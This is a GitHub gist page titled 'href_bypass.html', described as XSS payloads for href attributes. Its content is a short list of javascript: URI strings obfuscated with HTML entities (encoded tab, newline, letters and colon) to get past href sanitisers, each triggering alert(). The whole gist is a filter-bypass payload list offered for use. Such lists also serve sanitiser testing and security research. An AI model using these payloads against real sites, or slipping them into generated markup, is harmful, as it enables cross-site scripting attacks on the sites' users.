Skip to content

Instantly share code, notes, and snippets.

View thawkhant's full-sized avatar
🎯
Focusing

Thaw Khant thawkhant

🎯
Focusing
View GitHub Profile
@thawkhant
thawkhant / href_bypass.html
Created October 31, 2023 14:36 — forked from xsuperbug/href_bypass.html
XSS payloads for href
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)